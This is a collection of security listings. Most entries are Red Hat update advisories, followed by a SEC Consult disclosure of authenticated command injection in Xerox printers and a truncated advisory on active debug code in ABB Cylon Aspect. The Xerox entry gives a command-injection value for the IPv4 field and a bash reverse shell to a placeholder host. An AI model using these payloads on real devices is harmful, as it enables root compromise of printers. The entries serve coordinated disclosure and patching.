Red Hat Security Advisory 2024-8567-03 - An update for the pki-deps:10.6 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8567.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: pki-deps:10.6 security updateAdvisory ID:        RHSA-2024:8567-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8567Issue date:         2024-10-30Revision:           03CVE Names:          CVE-2024-38286====================================================================Summary: An update for the pki-deps:10.6 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The Public Key Infrastructure (PKI) Core contains fundamental packages required by Red Hat Certificate System.Security Fix(es):* tomcat: Denial of Service in Tomcat (CVE-2024-38286)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-38286References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2314686

Red Hat Security Advisory 2024-8567-03

Red Hat Security Advisory 2024-8563-03 - An update for buildah is now available for Red Hat Enterprise Linux 9.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8563.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: buildah security updateAdvisory ID:        RHSA-2024:8563-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8563Issue date:         2024-10-30Revision:           03CVE Names:          CVE-2024-9675====================================================================Summary: An update for buildah is now available for Red Hat Enterprise Linux 9.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The buildah package provides a tool for facilitating building OCI container images. Among other things, buildah enables you to: Create a working container, either from scratch or using an image as a starting point; Create an image, either from a working container or using the instructions in a Dockerfile; Build both Docker and OCI images. Security Fix(es):* buildah: Buildah allows arbitrary directory mount (CVE-2024-9675)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-9675References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2317458

Red Hat Security Advisory 2024-8563-03

Red Hat Security Advisory 2024-8546-03 - Red Hat Advanced Cluster Management for Kubernetes 2.9.5 General Availability release images, which fix bugs and update container images.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8546.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Red Hat Advanced Cluster Management 2.9.5 bug fixes and container updates  
Advisory ID:        RHSA-2024:8546-03  
Product:            Red Hat ACM  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8546  
Issue date:         2024-10-30  
Revision:           03  
CVE Names:          CVE-2024-42459  
====================================================================

Summary: 

Red Hat Advanced Cluster Management for Kubernetes 2.9.5 General  
Availability release images, which fix bugs and update container images.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE links in the References section.

Description:

Red Hat Advanced Cluster Management for Kubernetes 2.9.5 images

Red Hat Advanced Cluster Management for Kubernetes provides the  
capabilities to address common challenges that administrators and site  
reliability engineers face as they work across a range of public and  
private cloud environments. Clusters and applications are all visible and  
managed from a single console, with security policy built in.

This advisory contains the container images for Red Hat Advanced Cluster  
Management for Kubernetes, which fix several bugs. See the following  
Release Notes documentation, which will be updated for this  
release, for additional details:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.9/html/release_notes/

Security fix(es):  
nodejs/elliptic: EDDSA signature malleability occurs because there is a missing signature length check, and thus zero-valued bytes can be removed or appended (CVE-2024-42459)  
nodejs/elliptic: ECDSA signature malleability occurs because there is a missing check for whether the leading bit of r and s is zero (CVE-2024-42460)  
nodejs/elliptic: ECDSA implementation malleability due to BER-enconded signatures being allowed (CVE-2024-42461)  
Missing Validation in Elliptic's EDDSA Signature Verification (CVE-2024-48949)

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-42459

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.9/html/release_notes/

Red Hat Security Advisory 2024-8546-03

Red Hat Security Advisory 2024-8543-03 - An update for the pki-core:10.6 and pki-deps:10.6 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8543.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: pki-core:10.6 and pki-deps:10.6 security updateAdvisory ID:        RHSA-2024:8543-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8543Issue date:         2024-10-30Revision:           03CVE Names:          CVE-2024-38286====================================================================Summary: An update for the pki-core:10.6 and pki-deps:10.6 module is now available for Red Hat Enterprise Linux 8.8 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The Public Key Infrastructure (PKI) Core contains fundamental packages required by Red Hat Certificate System.Security Fix(es):* tomcat: Denial of Service in Tomcat (CVE-2024-38286)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-38286References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2314686

Red Hat Security Advisory 2024-8543-03

Red Hat Security Advisory 2024-8534-03 - An update is now available for Red Hat Ansible Automation Platform 2.5. Issues addressed include cross site scripting and memory exhaustion vulnerabilities.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8534.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: Red Hat Ansible Automation Platform 2.5 Product Release UpdateAdvisory ID:        RHSA-2024:8534-03Product:            Red Hat Ansible Automation PlatformAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8534Issue date:         2024-10-30Revision:           03CVE Names:          CVE-2024-10033====================================================================Summary: An update is now available for Red Hat Ansible Automation Platform 2.5Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat Ansible Automation Platform provides an enterprise framework for building, deploying and managing IT automation at scale. IT Managers can provide top-down guidelines on how automation is applied to individual teams, while automation developers retain the freedom to write tasks that leverage existing knowledge without the overhead. Ansible Automation Platform makes it possible for users across an organization to share, vet, and manage automation content by means of a simple, powerful, and agentless language.Security Fix(es):* automation-controller: Django: Memory exhaustion in django.utils.numberformat.floatformat() (CVE-2024-41989)* automation-controller: Django: Potential denial-of-service vulnerability in django.utils.html.urlize() (CVE-2024-45230)* automation-gateway: XSS on automation-gateway (CVE-2024-10033)* receptor: quic-go: memory exhaustion attack against QUIC's connection ID mechanism (CVE-2024-22189)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Updates and fixes included:* With this update, upgrades from Ansible Automation Platform 2.4 to 2.5 are supported for RPM and Operator-based deployments for Automation controller and Automation hub. For more information on how to upgrade, refer to the Upgrading section of the AAP landing page. (ANSTRAT-809)Container-based Ansible Automation Platform* The TLS Certificate Authority private key can now use a passphrase. (AAP-33594)* Automation hub is populated with container images (decision and execution environments) and Ansible collections. (AAP-33759)* The Automation controller, Event-Driven Ansible, and automation hub legacy UIs now display a redirect page to the Platform UI rather than a blank page. (AAP-33794)* Fixed the uninstall playbook execution when the environment was already uninstalled. (AAP-32981)* containerized installer setup has been updated to 2.5-3RPM-based Ansible Automation Platform* Added platform Redis to RPM-based Ansible Automation Platform. This allows a 6 node cluster for a Redis high availability (HA) deployment. (AAP-33773)* Removed the variable aap_caching_mtls and replaced it with redis_disable_tls and redis_disable_mtls which are boolean flags that disable Redis server TLS and Redis client certificate authentication. (AAP-33773)* An informative redirect page is now shown when going to automation controller, Event-Driven Ansible, or automation hub URL. (AAP-33827)* ansible-automation-platform-installer and installer setup have been updated to 2.5-4Additional changes:* automation-controller has been updated to 4.6.2* automation-eda-controller has been updated to 1.1.2* automation-gateway has been updated to 2.5.3* automation-hub/python3.11-galaxy-ng has been updated to 4.10.1* python3.11-django-ansible-base has been updated to 2.5.3* receptor has been updated to 1.4.9Solution:CVEs:CVE-2024-10033References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2273513https://bugzilla.redhat.com/show_bug.cgi?id=2302433https://bugzilla.redhat.com/show_bug.cgi?id=2314485https://bugzilla.redhat.com/show_bug.cgi?id=2319162

Red Hat Security Advisory 2024-8534-03

Red Hat Security Advisory 2024-8533-03 - Multicluster Engine for Kubernetes 2.4.6 General Availability release images, which fix bugs and update container images.

The following advisory data is extracted from:

https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8533.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Multicluster Engine for Kubernetes 2.4.6 security updates and bug fixes  
Advisory ID:        RHSA-2024:8533-03  
Product:            multicluster engine for Kubernetes  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:8533  
Issue date:         2024-10-30  
Revision:           03  
CVE Names:          CVE-2024-42459  
====================================================================

Summary: 

Multicluster Engine for Kubernetes 2.4.6 General Availability release images,   
which fix bugs and update container images.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE links in the References section.

Description:

Multicluster engine for Kubernetes v2.4.6 images

Multicluster engine for Kubernetes provides the foundational components  
that are necessary for the centralized management of multiple  
Kubernetes-based clusters across data centers, public clouds, and private  
clouds.

You can use the engine to create new Red Hat OpenShift Container Platform  
clusters or to bring existing Kubernetes-based clusters under management by  
importing them. After the clusters are managed, you can use the APIs that  
are provided by the engine to distribute configuration based on placement  
policy.

nodejs/elliptic: EDDSA signature malleability occurs because there is a missing signature length check, and thus zero-valued bytes can be removed or appended (CVE-2024-42459)  
nodejs/elliptic: ECDSA signature malleability occurs because there is a missing check for whether the leading bit of r and s is zero (CVE-2024-42460)  
nodejs/elliptic: ECDSA implementation malleability due to BER-enconded signatures being allowed (CVE-2024-42461)  
Missing Validation in Elliptic's EDDSA Signature Verification(CVE-2024-48949)

Solution:

https://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.9/html/clusters/install_upgrade/installing-while-connected-online-mce

CVEs:

CVE-2024-42459

References:

https://access.redhat.com/security/updates/classification/#important

Red Hat Security Advisory 2024-8533-03

Red Hat Security Advisory 2024-8528-03 - An update for pki-servlet-engine is now available for Red Hat Enterprise Linux 9.0 Extended Update Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_8528.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: pki-servlet-engine security updateAdvisory ID:        RHSA-2024:8528-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:8528Issue date:         2024-10-30Revision:           03CVE Names:          CVE-2024-38286====================================================================Summary: An update for pki-servlet-engine is now available for Red Hat Enterprise Linux 9.0 Extended Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Tomcat is the servlet engine that is used in the official Reference Implementation for the Java Servlet and JavaServer Pages technologies. The Java Servlet and JavaServer Pages specifications are developed by Sun under the Java Community Process.  Tomcat is developed in an open and participatory environment and released under the Apache Software License version 2.0. Tomcat is intended to be a collaboration of the best-of-breed developers from around the world.Security Fix(es):* tomcat: Denial of Service in Tomcat (CVE-2024-38286)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-38286References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2314686

Red Hat Security Advisory 2024-8528-03

GnuPG (the GNU Privacy Guard or GPG) is GNU's tool for secure communication and data storage. It can be used to encrypt data and to create digital signatures. It includes an advanced key management facility and is compliant with the proposed OpenPGP Internet standard as described in RFC2440. As such, it is meant to be compatible with PGP from NAI, Inc. Because it does not use any patented algorithms, it can be used without any restrictions.

GNU Privacy Guard 2.4.6

Various Xerox printers, such as models EC80xx, AltaLink, VersaLink, and WorkCentre, suffer from an authenticated remote code execution vulnerability.

SEC Consult Vulnerability Lab Security Advisory < 20241023-0 >  
=======================================================================  
              title: Authenticated Remote Code Execution  
            product: Multiple Xerox printers  
                     (EC80xx, AltaLink, VersaLink, WorkCentre)  
 vulnerable version: see vulnerable versions below  
      fixed version: see solution section below  
         CVE number: CVE-2024-6333  
             impact: high  
           homepage: https://xerox.com  
              found: 2023-12-14  
                 by: Timo Longin (Office Vienna)  
                     Tamas Jos (Office Zurich)  
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult, an Eviden business  
                     Europe | Asia

                     https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"We are a global leader in office and production print technology and related  
solutions, with a large and growing presence in Digital and IT Services.  
Having redefined the workplace experience for more than 100 years, our  
differentiated business and technology offerings are empowering client success  
today by addressing the productivity challenges of a hybrid workplace and  
distributed workforce."

Source: https://investors.xerox.com/

Business recommendation:  
------------------------  
SEC Consult recommends Xerox customers to install the latest updates and review  
the vendor's security note for further information.

Also make sure to have patches from previous security notes installed, such as  
XRX23-020. SEC Consult has re-identified some critical 0-days (unauthenticated RCE,  
partial authentication bypass) that were already patched but not clearly  
communicated in the previous security notes.

SEC Consult highly recommends to perform a thorough security review of the product  
conducted by security professionals to identify and resolve potential further  
security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Authenticated Remote Code Execution (RCE) (CVE-2024-6333)  
An attacker authenticated as a user with administrative access to the  
web interface of a range of affected Xerox printers can exploit a remote code  
execution vulnerability (RCE) as root user. It allows an attacker to execute  
commands directly on the operating system of the printer with root permissions.  
Consequently, the target Xerox printer can be fully compromised.

Proof of concept:  
-----------------  
1) Authenticated Remote Code Execution (RCE) (CVE-2024-6333)  
The "Network Troubleshooting" menu enables administrators to configure and run  
network troubleshooting based on the tcpdump tool. The web interface allows to  
apply custom filters like an IPv4 address as well as specific network services,  
as seen in the image (figure 1) below.

<img Network_Troubleshooting.png>

Due to insufficient input validation in the IPv4 address value, an attacker  
may inject further OS commands into the final tcpdump command string. For  
example, by setting the IPv4 address to the value "0.0.0.0$(bash $TMP~cmd)",  
commands stored under "/tmp/~cmd" get executed, when starting a network  
troubleshooting session.

Note: The payload in the IPv4 address must bypass a character filter,  
and was kept simple for demonstration purposes. Other payloads that directly  
execute commands without requiring the "/tmp/~cmd" file exist and can be  
crafted.

An attacker who, for example, has previously exploited the unauthenticated  
RCE vulnerability (fixed with Xerox Security Bulletin XRX23-020) can plant  
the following commands for a reverse shell in to "/tmp/~cmd".

-------------------------------------------------------------------------------

bash -i >/dev/tcp/X.X.X.X/10004 0>&1 2>&1

-------------------------------------------------------------------------------

Since, the network troubleshooting service is running tcpdump with root  
permissions, full access to a range of Xerox printers can be obtained this way.  
See figure 2 below.

<img reverse_shell.png>

Vulnerable versions:  
-----------------------------  
The following products & versions have been tested initially, which were not  
patched to the latest version according to vendor. Hence our other identified  
critical security issues were removed from this advisory.  
* Xerox Workcentre 7970 (073.200.167.09610)  
* Xerox Workcentre 7855 (073.040.167.09610)

According to the vendor, the following products are affected:

* AltaLink® B8045 / B8055 / B8065 / B8075 / B8090 (<103.xxx.024.18600 866140v3)  
* AltaLink® C8030 / C8035 / C8045 / C8055 / C8070 (<103.xxx.024.18600 866140v3)  
* Xerox® EC8036 / EC8056 (<103.xxx.024.18600 872818v3)  
* Xerox® EC8036 / EC8056 - Common Criteria (June 2022) (<103.023.031.35105 878257v3)  
* Xerox® EC8036 / EC8056 - Common Criteria (June 2024) (<103.xxx.013.14115 869823v3)  
* AltaLink®C8130 / C8135 / C8145 / C8155 / C8170 - Common Criteria (Aug 2024) (<119.xxx.023.13006 869829v3)  
* AltaLink® B8145 / B8155 / B8170 - Common Criteria (Aug 2024) (<119.xxx.023.13006 869829v3)  
* AltaLink® C8130 / C8135 / C8145 / C8155 / C8170 - Common Criteria Certified (Aug 2023) (<111.xxx.003.11600 869827v3)  
* AltaLink® B8145 / B8155 / B8170 - Common Criteria Certified (Aug 2023) (<111.xxx.003.11600 869827v3)  
* VersaLink® B625 / C625 - Common Criteria Certified (2024) (<119.xxx.003.11705 869818v3)  
* VersaLink® B415 / C415 - Common Criteria Certified (2024) (<119.xxx.003.11705 869818v3)  
* WorkCentre 3655/3655i (<075.060.004.07810 via Upgrade Tool)  
* WorkCentre 5945/55i (<075.091.004.07810 via Upgrade Tool)  
* WorkCentre 6655/6655i (<075.110.004.07810 via Upgrade Tool)  
* WorkCentre 7220/7225i (<075.030.004.07810 via Upgrade Tool)  
* WorkCentre 7830/7835i (<075.010 004.07810 via Upgrade Tool)  
* WorkCentre 7845/7855i (<075.040.004.07810 via Upgrade Tool)  
* WorkCentre 7845/7855 (IBG) (<075.080.004.07810 via Upgrade Tool)  
* WorkCentre 7970/7970i (<075.200.004.07810 via Upgrade Tool)  
* WorkCentre EC7836 (<075.050.004.07810 via Upgrade Tool)  
* WorkCentre EC7856 (<075.020.004.07810 via Upgrade Tool)

Vendor contact timeline:  
------------------------  
2024-02-05: Contacting vendor through the Xerox Security Response Center (XSRC)  
            https://forms.business.xerox.com/en-us/xerox-security-response-center/  
2024-02-06: Xerox assigns case id XSRC-2024-0003  
2024-02-08: Xerox provides links for the current firmware versions to confirm  
            whether the issues can be reproduced.  
2024-02-27: Xerox asks for status update.  
2024-02-28: The authenticated RCE was confirmed to be exploitable in the current  
            firmware version (075.040.013.29000 and 075.200.013.29000).  
            Vulnerability one and two are fixed in the most recent versions.  
2024-03-19: Xerox requests more information on provided PoCs.  
2024-04-02: SEC Consult provides the requested information.  
2024-04-18: SEC Consult asks for updates on the vulnerability status.  
2024-05-06: Xerox provides an update/patch for the affected WorkCentre7890 and 7855  
            series.  
2024-05-16: SEC Consult asks about a CVE number for the authenticated RCE  
            vulnerability. Also SEC Consult inquires about for further plans on  
            confirming the affected models and versions that are potentially  
            affected by the partial authentication bypass and pre-authenticated RCE  
            vulnerabilities.  
2024-05-21: Xerox states that they are evaluating other models. Also, they request  
            a CVSS score and vector for the authenticated RCE. Furthermore, more  
            details on the public disclosure timeline are requested.  
2024-05-23: SEC Consult provides the requested information.  
2024-06-03: Status update from Xerox regarding CVE-ID request. Furthermore,  
            more information on the to be released advisory is requested.  
2024-06-06: Status update from Xerox regarding CVE-ID request.  
2024-06-10: Xerox again requests a CVSS score and vector for the authenticated RCE.  
2024-06-14: SEC Consult again provides the CVSS score and vector. Also, information  
            on the to be released advisory is provided.  
2024-06-25: Xerox provides CVE-2024-6333 for the authenticated RCE vulnerability.  
2024-06-28: Informing Xerox about longer vacation period / absence.  
            Asking again about further affected models.  
2024-07-01: Xerox: Further models are affected, will be shared in the final publication.  
2024-07-16: Xerox asks for our publication draft.  
2024-07-31: Xerox asks again for our publication draft.  
2024-07-31: SEC Consult reminds Xerox about vacation, references our draft advisory  
            already sent a few months ago. Asking whether the other models are  
            affected by the authenticated RCE only, or by the other identified  
            vulnerabilities as well.  
2024-08-28: Xerox provides high-level summary of the case, but no details on affected  
            models.  
2024-10-03: SEC Consult provides an updated advisory with minor changes to Xerox,  
            again asking whether other versions and models are affected by the  
            described vulnerabilities.  
2024-10-07: Xerox provides further information on the partial authentication bypass  
            and pre-authenticated RCE vulnerabilities, showing that these have been  
            addressed in previous patches. Also, further coordination regarding  
            Xerox' Security Bulletin Release.  
2024-10-16: Release of Xerox Security Bulletin XRX24-015, covering the authenticated  
            RCE vulnerability.  
2024-10-21: Sending latest advisory draft to Xerox, setting release date to 23rd October.  
            Asking Xerox whether the security bulletin XRX23-020   
(https://securitydocs.business.xerox.com/wp-content/uploads/2023/11/XRX23-020_Security-Bulletin-for-AltaLink-VersaLink-and-WorkCentre-1.pdf) is the correct one for the other issues and why there is no   
mention  
            regarding our pre-auth RCE there.  
            Xerox responds with the link to the latest XRX24-015 bulletin and that  
            our advisory is fine.  
2024-10-23: Coordinated release of advisory.

Solution:  
---------  
Xerox provided patches for the affected printers. More information can be found  
in Xerox' Security Bulletin XRX24-015:

https://securitydocs.business.xerox.com/wp-content/uploads/2024/10/Xerox-Security-Bulletin-XRX24-015-for-Altalink-Versalink-and-WorkCentre-%E2%80%93-CVE-2024-6333-.pdf

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Timo Longin, Tamas Jos / @2024

Xerox Printers Authenticated Remote Code Execution

ABB Cylon Aspect version 3.08.01 is deployed to unauthorized actors with debugging code still enabled or active, which can create unintended entry points or expose sensitive information.

    ABB Cylon Aspect 3.08.01 (auth/) Active Debug Code VulnerabilityVendor: ABB Ltd.Product web page: https://www.global.abbAffected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio                  Firmware: 3.08.01Summary: ASPECT is an award-winning scalable building energy managementand control solution designed to allow users seamless access to theirbuilding data through standard building protocols including smart devices.Desc: The ABB BMS/BAS controller is deployed to unauthorized actors with debuggingcode still enabled or active, which can create unintended entry points or exposesensitive information.Tested on: GNU/Linux 3.15.10 (armv7l)           GNU/Linux 3.10.0 (x86_64)           GNU/Linux 2.6.32 (x86_64)           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz           PHP/7.3.11           PHP/5.6.30           PHP/5.4.16           PHP/4.4.8           PHP/5.3.3           AspectFT Automation Application Server           lighttpd/1.4.32           lighttpd/1.4.18           Apache/2.2.15 (CentOS)           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)Vulnerability discovered by Gjoko 'LiquidWorm' Krstic                            @zeroscienceAdvisory ID: ZSL-2024-5851Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5851.phpCWE ID: 489CWE URL: https://cwe.mitre.org/data/definitions/489.html21.04.2024--$ cat project                 P   R   O   J   E   C   T                        .|                        | |                        |'|            ._____                ___    |  |            |.   |' .---"|        _    .-'   '-. |  |     .--'|  ||   | _|    |     .-'|  _.|  |    ||   '-__  |   |  |    ||      |     |' | |.    |    ||       | |   |  |    ||      | ____|  '-'     '    ""       '-'   '-.'    '`      |____░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░  ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░ ░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                                     ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░          ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░          ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                                                                                                                                              $ ./db_list.sh ../[*] DEBUG enabled for:/htmlroot/auth/changePassword.php/htmlroot/auth/checkPassword.php/htmlroot/auth/passwordRules.php/htmlroot/auth/sessionCreate.php/htmlroot/auth/sessionLogout.php/htmlroot/auth/sessionValidate.php$ head -n 12 auth/changePassword.php | cat -n     1        <?php     2        $post = (empty($_POST)) ? json_decode(file_get_contents('php://input'), true) : $_POST;     3            4        $debug = (isset($post['debug']) && $post['debug'] === 'On');     5            6        if ($debug) {     7            ini_set('display_startup_errors', 1);     8            ini_set('display_errors', 1);     9            error_reporting(-1);    10        }    11          12        session_start();$ cat auth/changePassword.php | grep 84    84        if (debug) $data->_SESSION = $_SESSION;$ grep -irnHE "debug)|debug )" auth/*.phpauth/changePassword.php:6:if ($debug) {auth/changePassword.php:84:if ($debug) $data->_SESSION = $_SESSION;auth/checkPassword.php:6:if ($debug) {auth/checkPassword.php:54:if ($debug) $data->_SESSION = $_SESSION;auth/passwordRules.php:6:if ($debug) {auth/passwordRules.php:36:if ($debug) $data->_SESSION = $_SESSION;auth/sessionCreate.php:6:if ($debug) 